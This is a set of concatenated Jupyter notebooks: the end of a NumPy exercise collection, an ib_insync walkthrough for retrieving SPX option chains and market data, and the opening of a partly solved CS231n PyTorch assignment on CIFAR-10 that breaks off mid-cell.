P1 = np.random.uniform(-10,10,(10,2))
p = np.random.uniform(-10, 10, (10,2))
print(np.array([distance(P0,P1,p_i) for p_i in p]))
###Output
_____no_output_____
###Markdown
80. Consider an arbitrary array, write a function that extracts a subpart with a fixed shape and centered on a given element (pad with a `fill` value when necessary) (★★★)
###Code
# Author: Nicolas Rougier
Z = np.random.randint(0,10,(10,10))
shape = (5,5)
fill = 0
position = (1,1)
R = np.ones(shape, dtype=Z.dtype)*fill
P = np.array(list(position)).astype(int)
Rs = np.array(list(R.shape)).astype(int)
Zs = np.array(list(Z.shape)).astype(int)
R_start = np.zeros((len(shape),)).astype(int)
R_stop = np.array(list(shape)).astype(int)
Z_start = (P-Rs//2)
Z_stop = (P+Rs//2)+Rs%2
R_start = (R_start - np.minimum(Z_start,0)).tolist()
Z_start = (np.maximum(Z_start,0)).tolist()
R_stop = np.maximum(R_start, (R_stop - np.maximum(Z_stop-Zs,0))).tolist()
Z_stop = (np.minimum(Z_stop,Zs)).tolist()
r = [slice(start,stop) for start,stop in zip(R_start,R_stop)]
z = [slice(start,stop) for start,stop in zip(Z_start,Z_stop)]
R[tuple(r)] = Z[tuple(z)]  # index with tuples; list-of-slices indexing is deprecated
print(Z)
print(R)
###Output
_____no_output_____
###Markdown
81. Consider an array Z = \[1,2,3,4,5,6,7,8,9,10,11,12,13,14\], how to generate an array R = \[\[1,2,3,4\], \[2,3,4,5\], \[3,4,5,6\], ..., \[11,12,13,14\]\]? (★★★)
###Code
# Author: Stefan van der Walt
Z = np.arange(1,15,dtype=np.uint32)
R = stride_tricks.as_strided(Z,(11,4),(4,4))
print(R)
###Output
_____no_output_____
###Markdown
82. Compute a matrix rank (★★★)
###Code
# Author: Stefan van der Walt
Z = np.random.uniform(0,1,(10,10))
U, S, V = np.linalg.svd(Z) # Singular Value Decomposition
rank = np.sum(S > 1e-10)
print(rank)
###Output
_____no_output_____
###Markdown
83. How to find the most frequent value in an array?
###Code
Z = np.random.randint(0,10,50)
print(np.bincount(Z).argmax())
###Output
_____no_output_____
###Markdown
84. Extract all the contiguous 3x3 blocks from a random 10x10 matrix (★★★)
###Code
# Author: Chris Barker
Z = np.random.randint(0,5,(10,10))
n = 3
i = 1 + (Z.shape[0]-n)
j = 1 + (Z.shape[1]-n)
C = stride_tricks.as_strided(Z, shape=(i, j, n, n), strides=Z.strides + Z.strides)
print(C)
###Output
_____no_output_____
###Markdown
85. Create a 2D array subclass such that Z\[i,j\] == Z\[j,i\] (★★★)
###Code
# Author: Eric O. Lebigot
# Note: only works for 2d array and value setting using indices
class Symetric(np.ndarray):
def __setitem__(self, index, value):
i,j = index
super(Symetric, self).__setitem__((i,j), value)
super(Symetric, self).__setitem__((j,i), value)
def symetric(Z):
return np.asarray(Z + Z.T - np.diag(Z.diagonal())).view(Symetric)
S = symetric(np.random.randint(0,10,(5,5)))
S[2,3] = 42
print(S)
###Output
_____no_output_____
###Markdown
86. Consider a set of p matrices with shape (n,n) and a set of p vectors with shape (n,1). How to compute the sum of the p matrix products at once? (result has shape (n,1)) (★★★)
###Code
# Author: Stefan van der Walt
p, n = 10, 20
M = np.ones((p,n,n))
V = np.ones((p,n,1))
S = np.tensordot(M, V, axes=[[0, 2], [0, 1]])
print(S)
# It works, because:
# M is (p,n,n)
# V is (p,n,1)
# Thus, summing over the paired axes 0 and 0 (of M and V independently),
# and 2 and 1, to remain with a (n,1) vector.
###Output
_____no_output_____
###Markdown
87. Consider a 16x16 array, how to get the block-sum (block size is 4x4)? (★★★)
###Code
# Author: Robert Kern
Z = np.ones((16,16))
k = 4
S = np.add.reduceat(np.add.reduceat(Z, np.arange(0, Z.shape[0], k), axis=0),
np.arange(0, Z.shape[1], k), axis=1)
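# reduceat sums over the index ranges [0,k), [k,2k), ... along each axis,
# leaving a single value per 4x4 block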
print(S)
###Output
_____no_output_____
###Markdown
88. How to implement the Game of Life using numpy arrays? (★★★)
###Code
# Author: Nicolas Rougier
def iterate(Z):
# Count neighbours
N = (Z[0:-2,0:-2] + Z[0:-2,1:-1] + Z[0:-2,2:] +
Z[1:-1,0:-2] + Z[1:-1,2:] +
Z[2: ,0:-2] + Z[2: ,1:-1] + Z[2: ,2:])
# Apply rules
birth = (N==3) & (Z[1:-1,1:-1]==0)
survive = ((N==2) | (N==3)) & (Z[1:-1,1:-1]==1)
Z[...] = 0
Z[1:-1,1:-1][birth | survive] = 1
return Z
Z = np.random.randint(0,2,(50,50))
for i in range(100): Z = iterate(Z)
print(Z)
###Output
_____no_output_____
###Markdown
89. How to get the n largest values of an array (★★★)
###Code
Z = np.arange(10000)
np.random.shuffle(Z)
n = 5
# Slow
print (Z[np.argsort(Z)[-n:]])
# Fast
print (Z[np.argpartition(-Z,n)[:n]])
###Output
_____no_output_____
###Markdown
90. Given an arbitrary number of vectors, build the cartesian product (every combination of every item) (★★★)
###Code
# Author: Stefan Van der Walt
def cartesian(arrays):
arrays = [np.asarray(a) for a in arrays]
    shape = [len(x) for x in arrays]  # a concrete list; np.indices needs len()
ix = np.indices(shape, dtype=int)
ix = ix.reshape(len(arrays), -1).T
for n, arr in enumerate(arrays):
ix[:, n] = arrays[n][ix[:, n]]
return ix
print (cartesian(([1, 2, 3], [4, 5], [6, 7])))
###Output
_____no_output_____
###Markdown
91. How to create a record array from a regular array? (★★★)
###Code
Z = np.array([("Hello", 2.5, 3),
("World", 3.6, 2)])
R = np.core.records.fromarrays(Z.T,
names='col1, col2, col3',
formats = 'S8, f8, i8')
print(R)
###Output
_____no_output_____
###Markdown
92. Consider a large vector Z, compute Z to the power of 3 using 3 different methods (★★★)
###Code
# Author: Ryan G.
x = np.random.rand(int(5e7))  # the size argument must be an integer
%timeit np.power(x,3)
%timeit x*x*x
%timeit np.einsum('i,i,i->i',x,x,x)
###Output
_____no_output_____
###Markdown
93. Consider two arrays A and B of shape (8,3) and (2,2). How to find rows of A that contain elements of each row of B regardless of the order of the elements in B? (★★★)
###Code
# Author: Gabe Schwartz
A = np.random.randint(0,5,(8,3))
B = np.random.randint(0,5,(2,2))
C = (A[..., np.newaxis, np.newaxis] == B)
rows = np.where(C.any((3,1)).all(1))[0]
print(rows)
###Output
_____no_output_____
###Markdown
94. Considering a 10x3 matrix, extract rows with unequal values (e.g. \[2,2,3\]) (★★★)
###Code
# Author: Robert Kern
Z = np.random.randint(0,5,(10,3))
print(Z)
# solution for arrays of all dtypes (including string arrays and record arrays)
E = np.all(Z[:,1:] == Z[:,:-1], axis=1)
U = Z[~E]
print(U)
# solution for numerical arrays only, will work for any number of columns in Z
U = Z[Z.max(axis=1) != Z.min(axis=1),:]
print(U)
###Output
_____no_output_____
###Markdown
95. Convert a vector of ints into a matrix binary representation (★★★)
###Code
# Author: Warren Weckesser
I = np.array([0, 1, 2, 3, 15, 16, 32, 64, 128])
B = ((I.reshape(-1,1) & (2**np.arange(8))) != 0).astype(int)
print(B[:,::-1])
# Author: Daniel T. McDonald
I = np.array([0, 1, 2, 3, 15, 16, 32, 64, 128], dtype=np.uint8)
print(np.unpackbits(I[:, np.newaxis], axis=1))
###Output
_____no_output_____
###Markdown
96. Given a two dimensional array, how to extract unique rows? (★★★)
###Code
# Author: Jaime Fernández del Río
Z = np.random.randint(0,2,(6,3))
T = np.ascontiguousarray(Z).view(np.dtype((np.void, Z.dtype.itemsize * Z.shape[1])))
_, idx = np.unique(T, return_index=True)
uZ = Z[idx]
print(uZ)
###Output
_____no_output_____
###Markdown
97. Considering 2 vectors A & B, write the einsum equivalent of inner, outer, sum, and mul function (★★★)
###Code
A = np.random.uniform(0,1,10)
B = np.random.uniform(0,1,10)
np.einsum('i->', A) # np.sum(A)
np.einsum('i,i->i', A, B) # A * B
np.einsum('i,i', A, B) # np.inner(A, B)
np.einsum('i,j->ij', A, B) # np.outer(A, B)
###Output
_____no_output_____
###Markdown
98. Considering a path described by two vectors (X,Y), how to sample it using equidistant samples (★★★)?
###Code
# Author: Bas Swinckels
phi = np.arange(0, 10*np.pi, 0.1)
a = 1
x = a*phi*np.cos(phi)
y = a*phi*np.sin(phi)
dr = (np.diff(x)**2 + np.diff(y)**2)**.5 # segment lengths
r = np.zeros_like(x)
r[1:] = np.cumsum(dr) # integrate path
r_int = np.linspace(0, r.max(), 200) # regular spaced path
x_int = np.interp(r_int, r, x) # interpolate x at the regular arc-length samples
y_int = np.interp(r_int, r, y) # and likewise for y
###Output
_____no_output_____
###Markdown
99. Given an integer n and a 2D array X, select from X the rows which can be interpreted as draws from a multinomial distribution with n degrees, i.e., the rows which only contain integers and which sum to n. (★★★)
###Code
# Author: Evgeni Burovski
X = np.asarray([[1.0, 0.0, 3.0, 8.0],
[2.0, 0.0, 1.0, 1.0],
[1.5, 2.5, 1.0, 0.0]])
n = 4
M = np.logical_and.reduce(np.mod(X, 1) == 0, axis=-1)
M &= (X.sum(axis=-1) == n)
print(X[M])
###Output
_____no_output_____
###Markdown
100. Compute bootstrapped 95% confidence intervals for the mean of a 1D array X (i.e., resample the elements of an array with replacement N times, compute the mean of each sample, and then compute percentiles over the means). (★★★)
###Code
# Author: Jessica B. Hamrick
X = np.random.randn(100) # random 1D array
N = 1000 # number of bootstrap samples
idx = np.random.randint(0, X.size, (N, X.size))
means = X[idx].mean(axis=1)
confint = np.percentile(means, [2.5, 97.5])
print(confint)
###Output
_____no_output_____ |
notebooks/.ipynb_checkpoints/option_chain-checkpoint.ipynb | ###Markdown
Option chains
=============
###Code
from ib_insync import *
util.startLoop()
ib = IB()
ib.connect('127.0.0.1', 7497, clientId=12)
###Output
_____no_output_____
###Markdown
Suppose we want to find the options on the SPX, with the following conditions:

* Use the next three monthly expiries;
* Use strike prices within +- 20 dollars of the current SPX value;
* Use strike prices that are a multiple of 5 dollars.

To get the current market value, first create a contract for the underlyer (the S&P 500 index):
###Code
spx = Index('SPX', 'CBOE')
ib.qualifyContracts(spx)
###Output
_____no_output_____
###Markdown
To avoid issues with market data permissions, we'll use delayed data:
###Code
ib.reqMarketDataType(4)
###Output
_____no_output_____
###Markdown
Then get the ticker. Requesting a ticker can take up to 11 seconds.
###Code
[ticker] = ib.reqTickers(spx)
ticker
###Output
_____no_output_____
###Markdown
Take the current market value of the ticker:
###Code
spxValue = ticker.marketPrice()
spxValue
###Output
_____no_output_____
###Markdown
The following request fetches a list of option chains:
###Code
chains = ib.reqSecDefOptParams(spx.symbol, '', spx.secType, spx.conId)
util.df(chains)
###Output
_____no_output_____
###Markdown
These are four option chains that differ in ``exchange`` and ``tradingClass``. The latter is 'SPX' for the monthly and 'SPXW' for the weekly options. Note that the weekly expiries are disjoint from the monthly ones, so when interested in the weekly options the monthly options can be added as well.

In this case we're only interested in the monthly options trading on SMART:
###Code
chain = next(c for c in chains if c.tradingClass == 'SPX' and c.exchange == 'SMART')
chain
###Output
_____no_output_____
###Markdown
What we have here is the full matrix of expirations x strikes. From this we can build all the option contracts that meet our conditions:
###Code
strikes = [strike for strike in chain.strikes
if strike % 5 == 0
and spxValue - 20 < strike < spxValue + 20]
expirations = sorted(exp for exp in chain.expirations)[:3]
rights = ['P', 'C']
contracts = [Option('SPX', expiration, strike, right, 'SMART', tradingClass='SPX')
for right in rights
for expiration in expirations
for strike in strikes]
contracts = ib.qualifyContracts(*contracts)
len(contracts)
contracts[0]
###Output
_____no_output_____
###Markdown
Now to get the market data for all options in one go:
###Code
tickers = ib.reqTickers(*contracts)
tickers[0]
###Output
_____no_output_____
###Markdown
The option greeks are available from the ``modelGreeks`` attribute, and if there is a bid, ask resp. last price available also from ``bidGreeks``, ``askGreeks`` and ``lastGreeks``. For streaming ticks the greek values will be kept up to date to the current market situation.
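###Markdown
As a minimal sketch (not part of the original notebook), one way to read a few of these greeks, guarding against data that has not arrived yet:
###Code
t = tickers[0]
if t.modelGreeks is not None:
    print(t.contract.localSymbol, t.modelGreeks.delta, t.modelGreeks.impliedVol)
###Output
_____no_output_____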
###Code
ib.disconnect()
###Output
_____no_output_____ |
Lectures/CS231n/Assignments/assignment2-solved/.ipynb_checkpoints/PyTorch-checkpoint.ipynb | ###Markdown
What's this PyTorch business?

You've written a lot of code in this assignment to provide a whole host of neural network functionality. Dropout, Batch Norm, and 2D convolutions are some of the workhorses of deep learning in computer vision. You've also worked hard to make your code efficient and vectorized.

For the last part of this assignment, though, we're going to leave behind your beautiful codebase and instead migrate to one of two popular deep learning frameworks: in this instance, PyTorch (or TensorFlow, if you switch over to that notebook).

What is PyTorch?

PyTorch is a system for executing dynamic computational graphs over Tensor objects that behave similarly to numpy ndarrays. It comes with a powerful automatic differentiation engine that removes the need for manual back-propagation.

Why?

* Our code will now run on GPUs! Much faster training. When using a framework like PyTorch or TensorFlow you can harness the power of the GPU for your own custom neural network architectures without having to write CUDA code directly (which is beyond the scope of this class).
* We want you to be ready to use one of these frameworks for your project so you can experiment more efficiently than if you were writing every feature you want to use by hand.
* We want you to stand on the shoulders of giants! TensorFlow and PyTorch are both excellent frameworks that will make your lives a lot easier, and now that you understand their guts, you are free to use them :)
* We want you to be exposed to the sort of deep learning code you might run into in academia or industry.

PyTorch versions

This notebook assumes that you are using **PyTorch version 0.4**. Prior to this version, Tensors had to be wrapped in Variable objects to be used in autograd; however Variables have now been deprecated. In addition 0.4 also separates a Tensor's datatype from its device, and uses numpy-style factories for constructing Tensors rather than directly invoking Tensor constructors.

How will I learn PyTorch?

Justin Johnson has made an excellent [tutorial](https://github.com/jcjohnson/pytorch-examples) for PyTorch. You can also find the detailed [API doc](http://pytorch.org/docs/stable/index.html) here. If you have other questions that are not addressed by the API docs, the [PyTorch forum](https://discuss.pytorch.org/) is a much better place to ask than StackOverflow.

Table of Contents

This assignment has 5 parts. You will learn PyTorch on different levels of abstraction, which will help you understand it better and prepare you for the final project.

1. Preparation: we will use the CIFAR-10 dataset.
2. Barebones PyTorch: we will work directly with the lowest-level PyTorch Tensors.
3. PyTorch Module API: we will use `nn.Module` to define arbitrary neural network architecture.
4. PyTorch Sequential API: we will use `nn.Sequential` to define a linear feed-forward network very conveniently.
5. CIFAR-10 open-ended challenge: please implement your own network to get as high accuracy as possible on CIFAR-10. You can experiment with any layer, optimizer, hyperparameters or other advanced features.

Here is a table of comparison:

| API             | Flexibility | Convenience |
|-----------------|-------------|-------------|
| Barebone        | High        | Low         |
| `nn.Module`     | High        | Medium      |
| `nn.Sequential` | Low         | High        |

Part I. Preparation

First, we load the CIFAR-10 dataset.
This might take a couple minutes the first time you do it, but the files should stay cached after that.

In previous parts of the assignment we had to write our own code to download the CIFAR-10 dataset, preprocess it, and iterate through it in minibatches; PyTorch provides convenient tools to automate this process for us.
###Code
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.utils.data import sampler
import torchvision.datasets as dset
import torchvision.transforms as T
import numpy as np
NUM_TRAIN = 49000
# The torchvision.transforms package provides tools for preprocessing data
# and for performing data augmentation; here we set up a transform to
# preprocess the data by subtracting the mean RGB value and dividing by the
# standard deviation of each RGB value; we've hardcoded the mean and std.
transform = T.Compose([
T.ToTensor(),
T.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])
# We set up a Dataset object for each split (train / val / test); Datasets load
# training examples one at a time, so we wrap each Dataset in a DataLoader which
# iterates through the Dataset and forms minibatches. We divide the CIFAR-10
# training set into train and val sets by passing a Sampler object to the
# DataLoader telling how it should sample from the underlying Dataset.
cifar10_train = dset.CIFAR10('./cs231n/datasets', train=True, download=True,
transform=transform)
loader_train = DataLoader(cifar10_train, batch_size=64,
sampler=sampler.SubsetRandomSampler(range(NUM_TRAIN)))
cifar10_val = dset.CIFAR10('./cs231n/datasets', train=True, download=True,
transform=transform)
loader_val = DataLoader(cifar10_val, batch_size=64,
sampler=sampler.SubsetRandomSampler(range(NUM_TRAIN, 50000)))
cifar10_test = dset.CIFAR10('./cs231n/datasets', train=False, download=True,
transform=transform)
loader_test = DataLoader(cifar10_test, batch_size=64)
###Output
Files already downloaded and verified
Files already downloaded and verified
Files already downloaded and verified
###Markdown
You have an option to **use GPU by setting the flag to True below**. It is not necessary to use GPU for this assignment. Note that if your computer does not have CUDA enabled, `torch.cuda.is_available()` will return False and this notebook will fall back to CPU mode.

The global variables `dtype` and `device` will control the data types throughout this assignment.
###Code
USE_GPU = True
dtype = torch.float32 # we will be using float throughout this tutorial
if USE_GPU and torch.cuda.is_available():
device = torch.device('cuda')
else:
device = torch.device('cpu')
# Constant to control how frequently we print train loss
print_every = 100
print('using device:', device)
###Output
using device: cuda
###Markdown
Part II. Barebones PyTorch

PyTorch ships with high-level APIs to help us define model architectures conveniently, which we will cover in Part II of this tutorial. In this section, we will start with the barebone PyTorch elements to understand the autograd engine better. After this exercise, you will come to appreciate the high-level model API more.

We will start with a simple fully-connected ReLU network with two hidden layers and no biases for CIFAR classification. This implementation computes the forward pass using operations on PyTorch Tensors, and uses PyTorch autograd to compute gradients. It is important that you understand every line, because you will write a harder version after the example.

When we create a PyTorch Tensor with `requires_grad=True`, then operations involving that Tensor will not just compute values; they will also build up a computational graph in the background, allowing us to easily backpropagate through the graph to compute gradients of some Tensors with respect to a downstream loss. Concretely, if x is a Tensor with `x.requires_grad == True` then after backpropagation `x.grad` will be another Tensor holding the gradient of x with respect to the scalar loss at the end.

PyTorch Tensors: Flatten Function

A PyTorch Tensor is conceptually similar to a numpy array: it is an n-dimensional grid of numbers, and like numpy PyTorch provides many functions to efficiently operate on Tensors. As a simple example, we provide a `flatten` function below which reshapes image data for use in a fully-connected neural network.

Recall that image data is typically stored in a Tensor of shape N x C x H x W, where:

* N is the number of datapoints
* C is the number of channels
* H is the height of the intermediate feature map in pixels
* W is the width of the intermediate feature map in pixels

This is the right way to represent the data when we are doing something like a 2D convolution, that needs spatial understanding of where the intermediate features are relative to each other. When we use fully connected affine layers to process the image, however, we want each datapoint to be represented by a single vector -- it's no longer useful to segregate the different channels, rows, and columns of the data. So, we use a "flatten" operation to collapse the `C x H x W` values per representation into a single long vector. The flatten function below first reads in the N, C, H, and W values from a given batch of data, and then returns a "view" of that data. "View" is analogous to numpy's "reshape" method: it reshapes x's dimensions to be N x ??, where ?? is allowed to be anything (in this case, it will be C x H x W, but we don't need to specify that explicitly).
###Code
def flatten(x):
N = x.shape[0] # read in N, C, H, W
return x.view(N, -1) # "flatten" the C * H * W values into a single vector per image
def test_flatten():
x = torch.arange(12).view(2, 1, 3, 2)
print('Before flattening: ', x)
print('After flattening: ', flatten(x))
test_flatten()
###Output
Before flattening: tensor([[[[ 0., 1.],
[ 2., 3.],
[ 4., 5.]]],
[[[ 6., 7.],
[ 8., 9.],
[ 10., 11.]]]])
After flattening: tensor([[ 0., 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10., 11.]])
###Markdown
Barebones PyTorch: Two-Layer Network

Here we define a function `two_layer_fc` which performs the forward pass of a two-layer fully-connected ReLU network on a batch of image data. After defining the forward pass we check that it doesn't crash and that it produces outputs of the right shape by running zeros through the network.

You don't have to write any code here, but it's important that you read and understand the implementation.
###Code
import torch.nn.functional as F # useful stateless functions
def two_layer_fc(x, params):
"""
A fully-connected neural networks; the architecture is:
NN is fully connected -> ReLU -> fully connected layer.
Note that this function only defines the forward pass;
PyTorch will take care of the backward pass for us.
The input to the network will be a minibatch of data, of shape
(N, d1, ..., dM) where d1 * ... * dM = D. The hidden layer will have H units,
and the output layer will produce scores for C classes.
Inputs:
- x: A PyTorch Tensor of shape (N, d1, ..., dM) giving a minibatch of
input data.
- params: A list [w1, w2] of PyTorch Tensors giving weights for the network;
w1 has shape (D, H) and w2 has shape (H, C).
Returns:
- scores: A PyTorch Tensor of shape (N, C) giving classification scores for
the input data x.
"""
# first we flatten the image
x = flatten(x) # shape: [batch_size, C x H x W]
w1, w2 = params
# Forward pass: compute predicted y using operations on Tensors. Since w1 and
# w2 have requires_grad=True, operations involving these Tensors will cause
# PyTorch to build a computational graph, allowing automatic computation of
# gradients. Since we are no longer implementing the backward pass by hand we
# don't need to keep references to intermediate values.
# you can also use `.clamp(min=0)`, equivalent to F.relu()
x = F.relu(x.mm(w1))
x = x.mm(w2)
return x
def two_layer_fc_test():
hidden_layer_size = 42
x = torch.zeros((64, 50), dtype=dtype) # minibatch size 64, feature dimension 50
w1 = torch.zeros((50, hidden_layer_size), dtype=dtype)
w2 = torch.zeros((hidden_layer_size, 10), dtype=dtype)
scores = two_layer_fc(x, [w1, w2])
print(scores.size()) # you should see [64, 10]
two_layer_fc_test()
###Output
torch.Size([64, 10])
###Markdown
Barebones PyTorch: Three-Layer ConvNet

Here you will complete the implementation of the function `three_layer_convnet`, which will perform the forward pass of a three-layer convolutional network. Like above, we can immediately test our implementation by passing zeros through the network. The network should have the following architecture:

1. A convolutional layer (with bias) with `channel_1` filters, each with shape `KW1 x KH1`, and zero-padding of two
2. ReLU nonlinearity
3. A convolutional layer (with bias) with `channel_2` filters, each with shape `KW2 x KH2`, and zero-padding of one
4. ReLU nonlinearity
5. Fully-connected layer with bias, producing scores for C classes.

**HINT**: For convolutions: http://pytorch.org/docs/stable/nn.html#torch.nn.functional.conv2d; pay attention to the shapes of convolutional filters!
###Code
def three_layer_convnet(x, params):
"""
Performs the forward pass of a three-layer convolutional network with the
architecture defined above.
Inputs:
- x: A PyTorch Tensor of shape (N, 3, H, W) giving a minibatch of images
- params: A list of PyTorch Tensors giving the weights and biases for the
network; should contain the following:
- conv_w1: PyTorch Tensor of shape (channel_1, 3, KH1, KW1) giving weights
for the first convolutional layer
- conv_b1: PyTorch Tensor of shape (channel_1,) giving biases for the first
convolutional layer
- conv_w2: PyTorch Tensor of shape (channel_2, channel_1, KH2, KW2) giving
weights for the second convolutional layer
- conv_b2: PyTorch Tensor of shape (channel_2,) giving biases for the second
convolutional layer
- fc_w: PyTorch Tensor giving weights for the fully-connected layer. Can you
figure out what the shape should be?
- fc_b: PyTorch Tensor giving biases for the fully-connected layer. Can you
figure out what the shape should be?
Returns:
- scores: PyTorch Tensor of shape (N, C) giving classification scores for x
"""
conv_w1, conv_b1, conv_w2, conv_b2, fc_w, fc_b = params
scores = None
################################################################################
# TODO: Implement the forward pass for the three-layer ConvNet. #
################################################################################
scores = F.conv2d(x, conv_w1, conv_b1, padding=2)
scores = F.relu(scores)
scores = F.conv2d(scores, conv_w2, conv_b2, padding=1)
scores = F.relu(scores)
scores = flatten(scores).mm(fc_w) + fc_b
################################################################################
# END OF YOUR CODE #
################################################################################
return scores
###Output
_____no_output_____
###Markdown
After defining the forward pass of the ConvNet above, run the following cell to test your implementation.When you run this function, scores should have shape (64, 10).
###Code
def three_layer_convnet_test():
x = torch.zeros((64, 3, 32, 32), dtype=dtype) # minibatch size 64, image size [3, 32, 32]
conv_w1 = torch.zeros((6, 3, 5, 5), dtype=dtype) # [out_channel, in_channel, kernel_H, kernel_W]
conv_b1 = torch.zeros((6,)) # out_channel
conv_w2 = torch.zeros((9, 6, 3, 3), dtype=dtype) # [out_channel, in_channel, kernel_H, kernel_W]
conv_b2 = torch.zeros((9,)) # out_channel
# you must calculate the shape of the tensor after two conv layers, before the fully-connected layer
fc_w = torch.zeros((9 * 32 * 32, 10))
fc_b = torch.zeros(10)
scores = three_layer_convnet(x, [conv_w1, conv_b1, conv_w2, conv_b2, fc_w, fc_b])
print(scores.size()) # you should see [64, 10]
three_layer_convnet_test()
###Output
torch.Size([64, 10])
###Markdown
Barebones PyTorch: Initialization

Let's write a couple utility methods to initialize the weight matrices for our models.

- `random_weight(shape)` initializes a weight tensor with the Kaiming normalization method.
- `zero_weight(shape)` initializes a weight tensor with all zeros. Useful for instantiating bias parameters.

The `random_weight` function uses the Kaiming normal initialization method, described in:

He et al, *Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification*, ICCV 2015, https://arxiv.org/abs/1502.01852
###Code
def random_weight(shape):
"""
Create random Tensors for weights; setting requires_grad=True means that we
want to compute gradients for these Tensors during the backward pass.
We use Kaiming normalization: sqrt(2 / fan_in)
"""
if len(shape) == 2: # FC weight
fan_in = shape[0]
else:
fan_in = np.prod(shape[1:]) # conv weight [out_channel, in_channel, kH, kW]
# randn is standard normal distribution generator.
w = torch.randn(shape, device=device, dtype=dtype) * np.sqrt(2. / fan_in)
w.requires_grad = True
return w
def zero_weight(shape):
return torch.zeros(shape, device=device, dtype=dtype, requires_grad=True)
# create a weight of shape [3 x 5]
# you should see the type `torch.cuda.FloatTensor` if you use GPU.
# Otherwise it should be `torch.FloatTensor`
random_weight((3, 5))
###Output
_____no_output_____
###Markdown
Barebones PyTorch: Check Accuracy

When training the model we will use the following function to check the accuracy of our model on the training or validation sets.

When checking accuracy we don't need to compute any gradients; as a result we don't need PyTorch to build a computational graph for us when we compute scores. To prevent a graph from being built we scope our computation under a `torch.no_grad()` context manager.
###Code
def check_accuracy_part2(loader, model_fn, params):
"""
Check the accuracy of a classification model.
Inputs:
- loader: A DataLoader for the data split we want to check
- model_fn: A function that performs the forward pass of the model,
with the signature scores = model_fn(x, params)
- params: List of PyTorch Tensors giving parameters of the model
Returns: Nothing, but prints the accuracy of the model
"""
split = 'val' if loader.dataset.train else 'test'
print('Checking accuracy on the %s set' % split)
num_correct, num_samples = 0, 0
with torch.no_grad():
for x, y in loader:
x = x.to(device=device, dtype=dtype) # move to device, e.g. GPU
y = y.to(device=device, dtype=torch.int64)
scores = model_fn(x, params)
_, preds = scores.max(1)
num_correct += (preds == y).sum()
num_samples += preds.size(0)
acc = float(num_correct) / num_samples
print('Got %d / %d correct (%.2f%%)' % (num_correct, num_samples, 100 * acc))
###Output
_____no_output_____
###Markdown
BareBones PyTorch: Training Loop

We can now set up a basic training loop to train our network. We will train the model using stochastic gradient descent without momentum. We will use `torch.functional.cross_entropy` to compute the loss; you can [read about it here](http://pytorch.org/docs/stable/nn.html#cross-entropy).

The training loop takes as input the neural network function, a list of initialized parameters (`[w1, w2]` in our example), and learning rate.
###Code
def train_part2(model_fn, params, learning_rate):
"""
Train a model on CIFAR-10.
Inputs:
- model_fn: A Python function that performs the forward pass of the model.
It should have the signature scores = model_fn(x, params) where x is a
PyTorch Tensor of image data, params is a list of PyTorch Tensors giving
model weights, and scores is a PyTorch Tensor of shape (N, C) giving
scores for the elements in x.
- params: List of PyTorch Tensors giving weights for the model
- learning_rate: Python scalar giving the learning rate to use for SGD
Returns: Nothing
"""
for t, (x, y) in enumerate(loader_train):
# Move the data to the proper device (GPU or CPU)
x = x.to(device=device, dtype=dtype)
y = y.to(device=device, dtype=torch.long)
# Forward pass: compute scores and loss
scores = model_fn(x, params)
loss = F.cross_entropy(scores, y)
# Backward pass: PyTorch figures out which Tensors in the computational
# graph has requires_grad=True and uses backpropagation to compute the
# gradient of the loss with respect to these Tensors, and stores the
# gradients in the .grad attribute of each Tensor.
loss.backward()
# Update parameters. We don't want to backpropagate through the
# parameter updates, so we scope the updates under a torch.no_grad()
# context manager to prevent a computational graph from being built.
with torch.no_grad():
for w in params:
w -= learning_rate * w.grad
# Manually zero the gradients after running the backward pass
w.grad.zero_()
if t % print_every == 0:
print('Iteration %d, loss = %.4f' % (t, loss.item()))
check_accuracy_part2(loader_val, model_fn, params)
print()
print('After final iteration:')
check_accuracy_part2(loader_val, model_fn, params)
###Output
_____no_output_____
###Markdown
BareBones PyTorch: Train a Two-Layer Network

Now we are ready to run the training loop. We need to explicitly allocate tensors for the fully connected weights, `w1` and `w2`.

Each minibatch of CIFAR has 64 examples, so the tensor shape is `[64, 3, 32, 32]`. After flattening, `x` shape should be `[64, 3 * 32 * 32]`. This will be the size of the first dimension of `w1`. The second dimension of `w1` is the hidden layer size, which will also be the first dimension of `w2`. Finally, the output of the network is a 10-dimensional vector that represents the probability distribution over 10 classes.

You don't need to tune any hyperparameters but you should see accuracies above 40% after training for one epoch.
###Code
hidden_layer_size = 4000
learning_rate = 1e-2
w1 = random_weight((3 * 32 * 32, hidden_layer_size))
w2 = random_weight((hidden_layer_size, 10))
train_part2(two_layer_fc, [w1, w2], learning_rate)
###Output
Iteration 0, loss = 3.2505
Checking accuracy on the val set
Got 151 / 1000 correct (15.10%)
Iteration 100, loss = 2.1541
Checking accuracy on the val set
Got 312 / 1000 correct (31.20%)
Iteration 200, loss = 2.1399
Checking accuracy on the val set
Got 366 / 1000 correct (36.60%)
Iteration 300, loss = 2.1403
Checking accuracy on the val set
Got 361 / 1000 correct (36.10%)
Iteration 400, loss = 1.8222
Checking accuracy on the val set
Got 388 / 1000 correct (38.80%)
Iteration 500, loss = 1.6920
Checking accuracy on the val set
Got 421 / 1000 correct (42.10%)
Iteration 600, loss = 1.6406
Checking accuracy on the val set
Got 443 / 1000 correct (44.30%)
Iteration 700, loss = 2.0537
Checking accuracy on the val set
Got 406 / 1000 correct (40.60%)
After final iteration:
Checking accuracy on the val set
Got 419 / 1000 correct (41.90%)
###Markdown
BareBones PyTorch: Training a ConvNet

In the below you should use the functions defined above to train a three-layer convolutional network on CIFAR. The network should have the following architecture:

1. Convolutional layer (with bias) with 32 5x5 filters, with zero-padding of 2
2. ReLU
3. Convolutional layer (with bias) with 16 3x3 filters, with zero-padding of 1
4. ReLU
5. Fully-connected layer (with bias) to compute scores for 10 classes

You should initialize your weight matrices using the `random_weight` function defined above, and you should initialize your bias vectors using the `zero_weight` function above.

You don't need to tune any hyperparameters, but if everything works correctly you should achieve an accuracy above 42% after one epoch.
###Code
learning_rate = 3e-3
channel_1 = 32
channel_2 = 16
conv_w1 = None
conv_b1 = None
conv_w2 = None
conv_b2 = None
fc_w = None
fc_b = None
################################################################################
# TODO: Initialize the parameters of a three-layer ConvNet. #
################################################################################
conv_w1 = random_weight((32, 3, 5, 5))
conv_b1 = zero_weight((32,))
conv_w2 = random_weight((16, 32, 3, 3))
conv_b2 = zero_weight((16,))
